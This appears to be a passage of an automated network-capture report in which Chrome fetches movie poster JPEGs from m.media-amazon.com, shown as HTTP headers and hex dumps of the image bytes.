                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 05 13 1f 0b db 8a 18 cb 18 66 55 a7 36 30 03 55 84 02 b5 29 38 c0 48 c8 94 55 96 ee b5 64 e4 ef 8f 86 9b c1 dd 8f 78 20 12 d1 91 c6 71 81 60 5c 39 13 8c c6 c0 ed 9f 88 9a 8e f8 8f 5c e9 c4 4f 6e 91 e7 19 c6 0d 39 3d e5 54 71 13 13 13 1f 03 b6 9b c1 dd bc cf 70 e2 08 3b bc b3 57 ff 00 cf bb 65 c4 37 07 50 e3 51 71 af 18 d3 dc 6c ce 65 da 96 46 c0 eb 1e 97 39 ef 5e 7b f7 9a 6d 43 5a 48 36 db c3 8c 5d 73 e4 72 8e 33 1a b9 5d 23 3c 8d bf 51 8c 93 a5 99 56 94 7e 58 7e 01 ed f1 c6 d8 98 9a 7f 07 7b 07 78 60 31 db 02 c9 a7 af 99 ef 65 01 c7 6a 0f d5 89 71 ca d5 34 7e 1b 6d 4f de 65 69 ce a0 25 ba 74 ac 66 55 52 5a 71 29 a0 55 e3 5a d9 60 25 fe 73 28 7e 75 a1 db 8e 63 7f a9 c6 70 98 99 99 87 6c fc e8 f0 76 12 cf 30 c1 2e f0 66 8f ed 30 45 3f 58 97 7d b5 cd 17 86
                                                                                                                                                                                          Data Ascii: fU60U)8HUdx q`\9\On9=Tqp;We7PQqleF9^{mCZH6]sr3]#<QV~X~{x`1ejq4~mOei%tfURZq)UZ`%s(~ucplv0.f0E?X}
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 1a 60 31 3d aa f6 87 4e 08 02 7b 3a 7c 4e 92 fd 42 74 53 23 0f a7 47 ce 46 8e b1 e2 ee 8e 94 2c 55 08 02 8f fa 0c 09 da 76 d9 eb 0f e7 33 3f f4 ff 00 ff c4 00 2b 11 00 02 02 01 03 03 02 05 05 01 00 00 00 00 00 00 01 02 00 11 03 04 12 13 10 21 31 22 41 05 14 32 34 42 20 23 30 33 51 40 ff da 00 08 01 02 01 01 08 00 fd 35 2b a8 fd 75 2b a6 a4 90 82 86 47 a9 c8 f3 91 e7 2e 4b 83 33 ce 67 9c cf 39 9e 73 bc 19 de 0c ef 39 72 43 99 c4 19 de 73 bc 3a 8c 90 ea b2 cc 2e 5b 18 2d aa 34 82 2c 26 8d 4e 49 7d e0 9b 44 d9 36 4e 39 b2 6c e9 5d 2e 16 84 cc 1f d4 26 ac d2 08 1a 6e bf 3b 4c 62 6a 1c ac 3c 2e a9 a0 d6 99 f3 93 e7 16 0d 48 33 9d 67 2d fd 23 0e 53 3e 57 24 38 b2 0f 2d 98 43 a9 02 69 5a f0 29 9a d3 e8 58 1b bc 09 73 65 76 8e d6 8c 02 fc 2f 03 ad ab 7c 10 f9 47
                                                                                                                                                                                          Data Ascii: `1=N{:|NBtS#GF,Uv3?+!1"A24B #03Q@5+u+G.K3g9s9rCs:.[-4,&NI}D6N9l].&n;Lbj<.H3g-#S>W$8-CiZ)Xsev/|G
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 12 d3 11 b6 63 b1 62 56 bb 3a 6e 5b f9 c6 e9 16 33 9e e0 ae ac 74 e4 df df b1 37 a8 96 ab af 24 bc 7c 26 58 d5 ed 29 f2 62 37 12 18 57 70 74 e4 1b aa 38 66 dd 5d 42 bb 3e 2c 3a 65 45 b9 05 c2 a5 7c 3f 49 c7 b0 7b df d0 8d 7f 3a ea 76 35 fc ea a5 9d b4 0d d4 d1 a4 2d d6 e8 46 e2 c3 3e 80 85 c6 4f 51 b3 25 cb 34 e9 d9 cd 5d c2 b9 79 f8 6a 65 fe e1 e5 3e 4f a5 39 26 b3 a3 91 8f bf bc 47 d8 31 3a 9d c1 38 46 5e 75 c1 97 7e 3b 7c 71 7a 82 65 26 8b 0a 91 a5 39 28 cc 54 75 04 29 72 5b 2f 21 b4 c3 98 2b c4 84 27 c4 c6 1b c8 af 57 37 81 32 ff 00 70 f2 8f 26 6a 11 2a c8 e2 74 d9 3d 3f 63 b9 5e b5 28 bc b2 6a 64 8d e8 cc 3b bb 79 08 66 50 f1 10 95 b7 61 82 5f 59 ad ef c3 b2 86 2a c2 35 bb 1a 23 1d 18 02 b8 18 2c 2e ee 3b 39 2d b9 97 fb 87 94 79 3e a4 ca b2 8a fb 1b
                                                                                                                                                                                          Data Ascii: cbV:n[3t7$|&X)b7Wpt8f]B>,:eE|?I{:v5-F>OQ%4]yje>O9&G1:8F^u~;|qze&9(Tu)r[/!+'W72p&j*t=?c^(jd;yfPa_Y*5#,.;9-y>
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 85 08 dc 82 08 20 82 08 20 82 08 20 82 08 75 a2 03 7a 04 d9 01 c8 0e 21 7c 50 fb b6 da e1 e4 b9 38 cd b1 26 15 e2 ba c0 6c e7 1c c1 04 10 41 04 10 41 0d 08 99 81 51 5f 57 51 5f 15 ef 5a 6e 5e ae d3 e3 e6 8f 1f d2 7e 05 1d 9e bf 44 71 f4 97 15 7c 3e 5e ce 68 4e c6 ae 0e 09 23 eb 72 ae ab 17 c0 4f 8a a3 43 7e 05 fe 89 fa d7 9f 2c eb 54 7b e6 fa 07 af d2 89 e8 7b de fa c6 63 04 f5 87 bd 73 cc 55 3b f9 cb df cd 42 4b 72 d0 99 9b 82 e4 be fc 0b fa 9d d9 ec 9a 82 d4 31 08 05 a7 f0 c2 c8 7d d4 26 d6 52 64 dd 72 4c 3d ed 79 19 d2 41 0f 92 05 84 50 ed 6a ef 74 f5 83 76 b5 66 36 a7 7b 5b 4f f9 0f 50 bc 33 f3 9a 06 90 f7 aa cd fb ff 00 52 73 d6 f2 a9 f7 44 f3 86 e6 91 9d 10 f0 4a d6 0e f8 d6 5f 35 32 61 88 57 28 5a fc 93 ce 09 07 a1 35 c7 25 56 8a 6f 53 ad ff 00 b3
                                                                                                                                                                                          Data Ascii: uz!|P8&lAAQ_WQ_Zn^~Dq|>^hN#rOC~,T{{csU;BKr1}&RdrL=yAPjtvf6{[OP3RsDJ_52aW(Z5%VoS
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 61 d7 42 22 2e a2 77 a7 7d 9d f8 75 61 d6 9d e9 dc 9d e9 dc 9d e9 7d 48 fa 08 a8 96 96 d4 85 2f 2f 2d 2f a5 7d 26 47 6f a2 1a 0b 4d f0 26 f1 d7 19 71 d0 97 2e 2c 18 42 6d a2 7d 03 55 e8 cb 8c 15 ec d7 38 97 98 a5 42 5c c3 46 e2 94 c3 41 d4 90 c3 24 12 45 cb a9 70 74 3a 0c b9 72 e2 fd 40 68 db ab 49 70 c7 ab cc 58 32 e5 cb d4 bf a0 32 e5 e8 b8 b2 e6 30 a6 82 11 0a 46 2e 3b f6 6b b9 e6 61 3c e9 1c 18 de 0c a9 bb ea 82 0d 45 cb 85 75 97 e8 6e af 0d 5a c6 3e 33 50 5a 05 46 d2 e4 7e 62 b9 db 1b 56 dd 78 86 b3 94 8e b5 48 b9 50 b8 90 81 97 2e 5d 47 39 bd ce 5e 71 4b 6e f9 4d f2 76 20 11 b8 aa 8f db a4 93 8e f2 c7 8f e5 ae f7 99 75 2e 04 27 9d 00 65 bd be df 97 a1 da 0d 58 1b 06 f2 ef 58 36 f1 71 df 5e 3a 4e 3a a6 c8 c2 fb 42 5c 18 c7 7d 17 53 74 dc 1e 2e 19 47
                                                                                                                                                                                          Data Ascii: aB".w}ua}H//-/}&GoM&q.,Bm}U8B\FA$Ept:r@hIpX220F.;ka<EunZ>3PZF~bVxHP.]G9^qKnMv u.'eXX6q^:N:B\}St.G
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 74 29 71 d0 c7 42 6c f3 d0 4e 7e 74 18 96 42 88 fe fe cc c7 5d 74 16 74 df d6 55 5a b6 c3 a8 12 e5 40 95 5a 54 e7 42 4a 81 36 f9 e8 23 cb e7 45 04 b5 60 af 3f fc d2 86 87 44 fa 46 5c 75 2a 9e 61 a2 e5 5e 94 eb 14 21 db bc 2a 97 83 6f 78 6e 83 e6 7e c7 88 76 1b d5 69 a2 43 1d 2a 7c df cb 42 1c bc c3 29 22 cf e8 19 9b d7 af de 58 d4 53 19 74 aa 24 20 e8 46 5e d1 ef d8 36 9d a2 a8 5b 4d a5 65 5b ab d6 75 3f 9c c1 f0 31 eb c0 96 0d 1c c4 95 a1 41 e4 68 43 f2 8a 5d 04 78 9e cf e3 f1 05 9d c9 fb 8c 5e 2c 3b 25 a3 17 96 8c dd 96 84 14 8d b4 59 d8 07 f7 bc 3b c1 6c 5e f1 15 8c b6 3d 49 5e 63 0a c1 79 8a f9 3f 88 36 8d 83 42 c6 6f 2a 09 b7 c8 d0 99 1e 58 43 b6 e3 9b 87 d8 1e df fb 05 76 11 fd fc 46 08 df a0 bc ce 17 97 78 87 0a 3a 75 18 68 0c 2a 0c d1 c9 e0 a4 64
                                                                                                                                                                                          Data Ascii: t)qBlN~tB]ttUZ@ZTBJ6#E`?DF\u*a^!*oxn~viC*|B)"XSt$ F^6[Me[u?1AhC]x^,;%Y;l^=I^cy?6Bo*XCvFx:uh*d
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 5e ac 3d 6d 5e d9 c9 b5 8a 30 40 6d 96 19 36 5b 93 36 d9 57 b5 5c 21 c8 58 a1 4b 95 ea 64 3a d4 dc 30 6c 37 86 5c a7 26 ee 9b c5 1c c5 cd b5 72 d6 0c f0 13 b8 56 23 50 38 a0 bd e8 6e ec 37 a6 eb 38 da 37 b2 bd 8d 80 5d f1 48 87 aa 98 fd 53 7a b4 32 0e 1e 71 8d 83 87 09 05 e0 23 45 1c 8d db ed c8 27 79 5a cb dd 65 56 20 2e 63 22 e2 d2 08 10 95 76 5b 19 b4 29 ce 79 83 a7 83 8d 4a b9 53 27 24 38 77 8c 79 39 42 a6 09 45 e3 28 f0 3b 11 7e 9c 3d b6 a1 56 2b 36 cd 28 a7 0c 38 da 1c bd fe ad bf 8c 7d 16 ba 7f 24 3a ed a9 8b ea bf 27 da 70 d2 ea f3 b4 db 7e 1e 70 c3 f2 c5 bf 06 c3 76 f7 6f 05 c8 4c 8d b8 ba c2 2d d3 d4 21 d1 8b 28 d9 7c 6e fb de 2c 8f 44 e9 b5 ad 9e 12 22 b7 e9 93 6b dd f9 c9 f4 96 72 ca 29 be a4 da 35 64 df 31 5c 59 cf bb 97 e2 8f 44 18 16 f8 52
                                                                                                                                                                                          Data Ascii: ^=m^0@m6[6W\!XKd:0l7\&rV#P8n787]HSz2q#E'yZeV .c"v[)yJS'$8wy9BE(;~=V+6(8}$:'p~pvoL-!(|n,D"kr)5d1\YDR


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          128192.168.2.1649869151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:16 UTC644OUTGET /images/M/MV5BMTQ2Nzc1MDQzOF5BMl5BanBnXkFtZTgwMDgzMTA5MzE@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:16 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 27556
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 86b04391-6d23-49a6-be71-9239ee1ea956
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Wed, 31 Dec 2014 09:26:39 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sat, 03 Dec 2044 01:33:09 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 641107
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:16 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000108-IAD, cache-ewr-kewr1740065-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 90 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 01 08 09 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d6 d6 4d 6e 9c f8 a7 0f 06 ef 4c 75 42 a8
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"4MnLuB
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: a0 7f 46 3d 49 13 94 c7 fa 7b ec 72 f9 76 a1 af 37 95 23 9f 43 2b 84 69 ce 79 5b 0c 71 1e 79 8d da bd 5e 71 41 f3 54 98 7c 99 5b c8 a3 86 aa d2 cd 54 44 32 88 27 52 45 8f 29 2a 56 2b ca e1 44 cb 9a f1 14 98 e9 26 56 25 49 07 31 0e 62 59 38 c0 d5 89 a5 4b ba ed 28 d5 bc 2c ed 7f 65 9c ce 6f 8d df 26 bd 4c 63 a5 26 c7 3f 06 f3 9c ea bd c4 8b e3 07 1a db b1 20 5c ee 3d c2 8e b5 a3 a8 d3 bc b5 22 03 89 b8 c7 f0 3e 98 e9 9f 38 8d f7 1d 62 96 4b 43 e6 28 8e ac 89 b3 0a c6 59 2d f3 62 64 d5 b9 8f 3b f5 46 8e 48 95 b4 88 45 e6 7d 1d 20 d1 d5 2c dc 6d 09 f5 a1 2e 1b ac bb 97 52 48 f6 33 24 96 be 5b 31 37 20 a5 78 bc 47 40 da cd 77 56 b9 45 2e 39 9f aa 97 3b bc c8 ba d1 bd 3c f2 15 23 71 6e b9 f4 05 43 33 be 67 4b 24 f1 0f 1d 7c 76 66 d1 cc 7a 22 4e b9 af 3b d4 77
                                                                                                                                                                                          Data Ascii: F=I{rv7#C+iy[qy^qAT|[TD2'RE)*V+D&V%I1bY8K(,eo&Lc&? \=">8bKC(Y-bd;FHE} ,m.RH3$[17 xG@wVE.9;<#qnC3gK$|vfz"N;w
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 56 b6 0c 31 23 a8 9f 0d ff 00 ae f9 c5 e9 6d 1d 8b ae a7 4f 7a df 5a d8 9f b4 65 7f 4a fe c6 bf 8b 5d a0 c1 b3 87 eb 6c d6 28 b0 f8 6b f8 3d 5a cf 74 a9 35 d4 74 87 cd bc d3 68 16 82 5c f8 6a 78 48 b7 59 55 fe 17 6f db fa 7a 1e 1d a9 d0 87 0b 60 d7 9e 8b 5e 92 cd 3d 64 27 0e e1 da 8e 1f b8 02 a1 81 0d a5 e1 d7 68 18 8a 7f 68 ca fe 95 fd 8f 8a 07 f8 c2 68 7a 69 a9 da dc 5d d6 e1 a7 97 71 3b 34 dd 6e aa f5 bd 43 a6 b7 58 da 35 36 1d 3f 10 7b d0 3a 5d c4 de 8d bb f5 fc 50 e8 7a be 9a d7 b5 77 37 86 b7 5e ba 43 56 66 a6 d7 a4 65 34 5a d4 d6 26 f4 9a ce 20 fa 20 5d 8e a2 d5 af 99 34 9c 55 f5 83 75 4d ac b6 be af a6 d6 57 a9 19 af e7 32 bf a5 7f 63 e2 9f b6 9c 3b ed e9 9a 9f fe d3 4f 18 02 08 3f 0e a6 d4 bc 4e 35 f6 97 ce 09 f6 94 4b 51 6c f6 b7 c4 9f 6b 13 b0
                                                                                                                                                                                          Data Ascii: V1#mOzZeJ]l(k=Zt5th\jxHYUoz`^=d'hhhzi]q;4nCX56?{:]Pzw7^CVfe4Z& ]4UuMW2c;O?N5KQlk
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 99 99 99 f0 cc cf 86 66 66 66 66 66 e9 ba 66 29 98 31 68 b1 a3 0d bd 25 4d a6 e9 cc 17 69 55 48 43 a7 51 98 2b 53 f5 2d 30 70 fd df 4f 2d ab 25 48 5f ed c8 1d d5 80 19 5c 2c 1f 2e 3c 73 f3 66 62 01 16 bd c7 10 68 17 f3 e4 29 ed 0f 0e af f0 34 49 d7 2d a6 55 9c b1 88 10 40 2a fc 95 af f8 90 93 67 f5 cb c4 da 7f 2f a3 b2 bf ab 6e 22 91 8c 44 ab 00 ca c9 39 cf 39 5a 6f 59 fd 7c 99 f9 f3 33 e1 d0 4c c0 d3 ac e5 c1 59 9b 3f bd a6 0a da 72 de 30 61 00 66 38 02 86 9e 58 b7 66 ac 8e f8 c4 fe b0 d4 3f f2 1a 41 82 67 2e 83 d9 aa ac 01 b2 c7 da 70 37 b0 ed ef fc 8f 9b 3f 38 9d 04 aa bd 39 00 bb 53 57 5d 97 af 65 4a 11 f1 d0 ae cf a8 b6 04 4b d7 bb 07 a5 67 36 be f1 5b 7e 76 22 d8 bd bf 56 1a 6f 33 36 a7 7c f4 cc 23 72 a4 5d 98 1b c2 a3 76 dd 49 83 97 f8 38 85 66 04
                                                                                                                                                                                          Data Ascii: ffffff)1h%MiUHCQ+S-0pO-%H_\,.<sfbh)4I-U@*g/n"D99ZoY|3LY?r0af8Xf?Ag.p7?89SW]eJKg6[~v"Vo36|#r]vI8f
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 75 2f 4b 36 de 1e ba 8c ee ba ba f3 f5 1a cf e3 a8 99 f9 91 73 d1 6c 46 04 02 ec 57 12 bb bb 02 f6 84 94 af b7 7c 55 dd 08 7b 71 b9 77 05 20 58 d9 55 0a 7d aa ac 47 bc 40 89 4c ce ee dc 33 bb 2c d9 36 46 aa 2f 41 f2 1e eb e1 c4 3e de d9 f8 9b c0 cc 23 2d 1e fb b7 05 9a 9f c6 01 5a 62 b8 b3 11 c4 ff 00 f0 30 fc f4 18 83 ac cc 15 10 b8 87 2c a0 35 94 9b 67 28 91 89 4d 49 ee e6 30 c7 75 5d b9 21 ee ea a1 19 b2 c5 9a c7 61 8c d7 fa 80 ed b0 63 6c 6a 99 43 30 35 d8 bb 52 70 2a 39 56 34 ac 7b 6b f0 d4 ea 16 a4 57 35 30 71 91 55 9c d1 9f 16 fe 3e 1a ff 00 b7 b6 3f b5 73 2d e1 fa bb 07 b3 41 c2 6c d3 fb dd e9 bb ae 19 7c af ba da b4 e6 f3 96 6f 0c 42 3c 07 86 ec 60 ce 64 e7 4d f0 3c dd 0f 58 aa 65 a4 2f 53 5f bf b0 47 d3 e7 7e a5 cd c5 58 3d 67 2a 45 ff 00 50 9a
                                                                                                                                                                                          Data Ascii: u/K6slFW|U{qw XU}G@L3,6F/A>#-Zb0,5g(MI0u]!acljC05Rp*9V4{kW50qU>?s-Al|oB<`dM<Xe/S_G~X=g*EP
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: dc d8 d5 06 38 71 7d ce 94 e8 98 8a 54 c0 cf 76 46 a3 19 34 37 41 a9 c6 04 cb 98 64 42 a7 f1 97 5e 3c f9 a1 38 82 57 d8 d8 2a 55 4e 60 4e 39 db 0a 45 c6 61 2c 6c 14 d3 7f 87 4a a2 83 a3 63 c4 4c ea b3 d9 3b e5 30 16 43 cd ad 09 c9 e6 01 94 dc 5c 19 5e 64 19 31 d5 f5 ff 00 de af 35 37 9f 03 9f be a4 53 67 92 71 ad db 6b e8 10 bd 72 48 30 e5 69 6d 3a c6 17 63 c9 0f 5c 96 7b 36 7e ee 26 2d ca 09 c7 a5 0b 66 67 d2 6f 00 8a a3 cf 52 6f 36 28 df 98 1e c0 20 79 8c a7 71 b3 7f 77 53 93 36 40 b3 ff 00 36 c1 85 9b f5 1a 56 be 55 76 80 a1 72 7d 19 a9 c6 05 37 b1 59 b4 f8 81 a8 dc 4e 0c 28 2c b0 77 be 22 86 db 47 72 54 a2 20 a1 03 10 66 1d 21 c8 6c 85 4c 20 22 b9 34 60 6e 25 cc 64 91 32 e9 c6 54 a8 f8 7a 7e 6e fc 51 95 14 73 0b 95 69 58 f6 8b b5 1f 88 a3 7f 8e c2 e4
                                                                                                                                                                                          Data Ascii: 8q}TvF47AdB^<8W*UN`N9Ea,lJcL;0C\^d157SgqkrH0im:c\{6~&-fgoRo6( yqwS6@6VUvr}7YN(,w"GrT f!lL "4`n%d2Tz~nQsiX
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 06 48 0c 90 19 20 32 41 01 92 c0 7f e3 1b 82 72 29 c8 a2 8a 28 a2 8a 28 a2 8a 28 a3 d6 14 51 45 14 51 45 15 80 ff 00 c6 c0 75 86 03 14 d7 bb 68 61 82 d2 67 f2 6c 11 88 fc be 03 ab b1 aa fe c3 2e 68 f8 d4 22 36 a3 f7 44 cd a8 f4 5c 30 25 3b 4a a3 0e 09 d2 c7 44 91 e8 a9 02 a4 08 c8 df 02 53 e3 b8 13 ec 9e 0f aa 16 fb f5 98 0e af be e5 70 ae f0 bb a5 58 e9 b6 ae d5 29 0d 1c 55 80 2f d5 28 5a 17 75 b0 5f a8 54 9e c2 27 8a 13 80 e7 d6 60 3a bb 89 57 81 a9 7b d5 b4 47 92 b1 c1 59 41 21 fc 8d b9 0a a8 8b fe f0 cc 41 51 3a 8f 49 ed e9 cb ea 75 51 b9 df 78 66 17 45 b4 64 69 34 f6 8f cb ad c0 75 76 8b 14 9e cb 2b fc 4a 49 34 7b f0 56 de 76 ab 1c 15 b4 11 87 b2 b4 cd db cc cd 5f aa 54 ec e5 57 ea 15 fe e3 15 63 ba cc 07 51 44 08 37 87 7c 95 1e 8b 4e d8 93 5f 45 e3
                                                                                                                                                                                          Data Ascii: H 2Ar)(((QEQEuhagl.h"6D\0%;JDSpX)U/(Zu_T'`:W{GYA!AQ:IuQxfEdi4uv+JI4{Vv_TWcQD7|N_E
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: f2 82 b6 f9 2b 93 bf 39 f0 52 47 9a 9a 07 74 66 9c 04 2e b0 f3 82 a6 e4 55 2c 4e 16 22 48 c6 09 91 de a8 c6 7d 71 aa 23 6d c9 90 85 e5 e2 1f 15 f1 4d d2 db 18 28 67 14 39 a0 47 04 48 4f 09 d1 4d 15 7a d4 04 f9 a0 2f b9 5d f5 24 23 b3 e6 98 84 36 2b 6a 27 2a 81 ca a6 a6 91 be a1 11 1b 14 1a e1 50 92 08 d5 1c c2 1f f4 99 ff 00 4b d6 09 a5 35 35 34 55 34 c1 b6 48 7b 21 cc c1 4a 1b 53 7f d9 33 9d 5e a8 73 42 1c d0 50 aa cc 50 3c 2c 40 27 74 ae 18 a3 3c 07 f4 8c fc 2a 70 ba f4 23 04 34 23 01 25 39 cc 59 cd 4d 83 bd 82 be a0 a5 53 60 14 d0 d6 61 27 1b 93 4e f4 c4 d8 6c 8f ba 82 70 4e 09 e1 38 7b 27 08 28 66 80 41 02 bd 2a 06 c4 d8 47 13 25 37 78 a0 88 84 2c bd 42 0e c6 de 0b b5 7b 6e 7a 93 9c 60 e6 b9 08 db b6 08 c7 49 a2 31 db 72 68 98 11 86 49 a9 bc d7 cb 24
                                                                                                                                                                                          Data Ascii: +9RGtf.U,N"H}q#mM(g9GHOMz/]$#6+j'*PK554U4H{!JS3^sBPP<,@'t<*p#4#%9YMS`a'NlpN8{'(fA*G%7x,B{nz`I1rhI$
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: b1 49 59 4f 1e d3 fc 7f 91 1d 73 aa 53 59 d5 3a fc 3d 52 fa c3 ca 75 4e a8 60 9e 0a d0 7f e0 04 8b 81 ff 00 e2 c6 67 fd 70 56 38 b2 45 08 43 5d 65 1d ca 8d 80 bb 52 84 0d 0c da 82 c7 fe 6c cf fa 60 d6 21 33 f1 de 27 6f 32 f4 c5 6a 5b 98 a1 68 26 c8 06 21 7b 1b 5d 81 0e 73 0c 35 06 ec 81 4a 19 32 1b 02 87 74 bc 12 94 4e ac 47 72 01 03 bc 27 67 6f cd 02 4c bb f5 98 e5 e7 28 07 b0 20 2d e8 15 dd 46 38 3f 7c 14 78 c4 69 80 ec 51 87 59 12 40 74 b2 f3 50 18 11 1f e5 99 ff 00 4c 19 5c 5b da a0 69 00 0b 85 e3 87 03 fe bc 8c 29 c3 fb b4 66 fc 7e 19 df df 71 67 b0 80 5d 26 07 41 f9 81 05 62 01 72 41 02 23 78 d4 2d 2d ba 0a 00 01 0d 3b fe a4 e6 5c f4 6e 89 00 54 3f cb 33 fe 98 7f bc 11 98 98 28 77 0f c7 03 1a 3e 14 3d 4c c4 bf 7d 50 b7 d0 23 bc 5d 0a ea 05 fb 0e e6
                                                                                                                                                                                          Data Ascii: IYOsSY:=RuN`gpV8EC]eRl`!3'o2j[h&!{]s5J2tNGr'goL( -F8?|xiQY@tPL\[i)f~qg]&AbrA#x--;\nT?3(w>=L}P#]
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: e3 4b 11 37 9b 38 e0 b5 ce 08 aa 13 ac d3 37 da 8e 3c e5 e0 85 d3 a8 b0 07 42 e0 42 f1 bb bf 75 06 3a 20 19 99 04 09 dc 27 3c 35 b2 26 5c 35 bc f2 e9 2e fa 20 4e 4b c9 74 80 c6 80 1d 8b fe 46 e0 02 9c ce a1 08 20 12 d3 d6 64 18 d8 fc ca 1d 02 9e 88 bc 97 be 06 7d 7f e2 6f be e8 03 9f 31 3f 6c 4f eb a3 3e 44 7f ce 9f b7 a7 ed 69 a4 f3 30 c7 02 ee f8 9a 82 f7 fc 40 0c f9 ff 00 88 05 af df 07 ec d0 03 e4 4f ed 27 f7 90 fe f9 3f 6e c2 b0 1e e8 d9 79 d3 0e c0 fe 9b 4e 0f b3 88 39 d1 cd 98 cc 96 a8 f3 d0 34 87 af da 21 ac 77 80 6a 47 e6 34 80 67 61 0f 81 ab 87 06 90 a0 b8 03 02 f8 da 02 60 f7 84 a8 2b 97 e2 37 23 e7 05 6a 20 70 4c b1 fc e9 0c 20 03 88 10 e9 08 46 c0 28 99 79 f4 94 24 24 1c e5 4c ca b8 06 ee 11 b7 ac ed 10 23 68 12 7e 51 18 82 45 af 3e c3 27 f1
                                                                                                                                                                                          Data Ascii: K787<BBu: '<5&\5. NKtF d}o1?lO>Di0@O'?nyN94!wjG4ga`+7#j pL F(y$$L#h~QE>'


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          129192.168.2.1649871151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:16 UTC445OUTGET /images/M/MV5BNzkyYjk2MGMtNjdlYS00M2Y5LThiNmMtNDQxYTk2MTUyNmMwXkEyXkFqcGdeQXVyOTg4MDk3MTQ@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:16 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 38902
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 2aaf368f-2539-48c5-b315-a18b22f28eff
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
